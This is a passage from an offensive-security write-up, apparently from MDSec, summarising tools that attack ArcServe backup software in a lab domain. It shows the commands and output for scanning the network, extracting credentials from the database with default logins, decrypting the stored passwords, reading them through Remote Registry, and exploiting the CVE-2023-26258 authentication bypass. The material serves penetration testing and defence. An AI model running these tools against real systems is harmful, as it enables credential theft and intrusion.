The TL; DR;
If you are in the network you can scan for instances configured by default using ArcServeRadar.py. I tried to port it to C# but couldn't, feel free to do it if you know how :)
c:\Users\vagrant\Desktop>python ArcServeRadar.py "Ethernet 2" 6969 192.168.56.20
-=[ ArcServe Finder - @TheXC3LL - MDSec ]=-
[*] Starting to monitor
[*] Broadcasting
WARNING: Mac address to reach destination not found. Using broadcast.
[+] 192.168.56.10 => ServerName;KINGSLANDING;InstanceName;ARCSERVE_APP;IsClustered;No;Version;15.0.2000.5;tcp;62197;;If it is configured by default you can use default DB creds to connect to the IP and port obtained before and read the username/password plus where the ArcServe instances are located using ArcServe-dbpwner.py:
psyconauta@insulanova:/tmp|⇒ python3 arcserve-dbpwner.py -target 192.168.56.10 -port 62197
-=[ ArcServe credential retriever (from DB) - Juan Manuel Fernandez (@TheXC3LL) - MDSec]=-
[*] Connecting to the server
[*] Login with default creds
[*] Extracting credentials:
[+] User: SEVENKINGDOMS\vagrant
[+] Password: {133, 60, 97, 192, 158, 159, 25, 141, 58, 250, 174, 169, 141, 216, 104, 98}; // Paste it to the decrypter
[+] User: SEVENKINGDOMS\vagrant
[+] Password: {133, 60, 97, 192, 158, 159, 25, 141, 58, 250, 174, 169, 141, 216, 104, 98}; // Paste it to the decrypter
[*] Finding hosts:
[+] 192.168.56.10 | kingslanding.sevenkingdoms.local | Windows Server 2019 Datacenter Evaluation
[+] 192.168.56.10 | kingslanding.sevenkingdoms.local | NULL
Have a nice day! ^_^All the passwords retrieved by the tools can be decrypted using ArcServeDecrypter.exe. Just edit the C code to add the array, compile and execute it:
C:\Users\vagrant>C:\Users\vagrant\source\repos\ArcServeDecrypter\x64\Debug\ArcServeDecrypter.exe
-={ ArcServe Decryptor by Juan Manuel Fernandez (@TheXC3LL) - MDSec}=-
[+] Decrypted string: vagrantIf you have a user with local admin privileges on the server where ArcServe is installed you can read the credentials using Remote Registry service (arcserve-regkeys.py):
psyconauta@insulanova:/tmp|⇒ python3 arcserve-regkeys.py -u eddard.stark -p 'FightP3aceAndHonor!' -d sevenkingdoms.local -target-ip 192.168.56.20
-=[ ArcServe Credential Stealer - (@TheXC3LL) - MDSec]=-
[+] Connecting to 192.168.56.20
[+] Checking Remote Registry service status...
[+] Service is down!
[+] Starting Remote Registry service...
[+] Connecting to 192.168.56.20
[+] Opening registry key
[*] User: P3TWLADS11STD\vagrant
[*] Password: {133, 60, 97, 192, 158, 159, 25, 141, 58, 250, 174, 169, 141, 216, 104, 98}; // Paste it to the decrypter
[+] Stopping Remote Registry Service
Have a nice day! ^_^Finally, if the ArcServe version was not patched (CVE-2023-26258) you can exploit an authentication bypass in the management web interface and retrieve the admin creds (ArcServe-exploit.py):
psyconauta@insulanova:/tmp|⇒ python3 ArcServe-exploit.py 192.168.56.10
-=[ ArcServe Pwner by Juan Manuel Fernandez (@TheXC3LL) - MDSec]=-
[*] Triggering info leak
[+] AdminName: SEVENKINGDOMS\vagrant
[+] AuthUUID: 6bf37b8e-ac4f-487d-8d74-d6d0a8d9b8d1
[*] Getting a valid session
[+] Session: AGENTJSESSIONID=CA35EF18A4FF2F85E25538F60C3F7428
[*] Doing an authenticated request to validate if session is valid
[*] Session is valid
[+] Admin: SEVENKINGDOMS\vagrant
[+] Password: {133, 60, 97, 192, 158, 159, 25, 141, 58, 250, 174, 169, 141, 216, 104, 98} // Paste it to the decrypter
Have a happy hacking! ^_^So here ends the summary of tools that you can find here.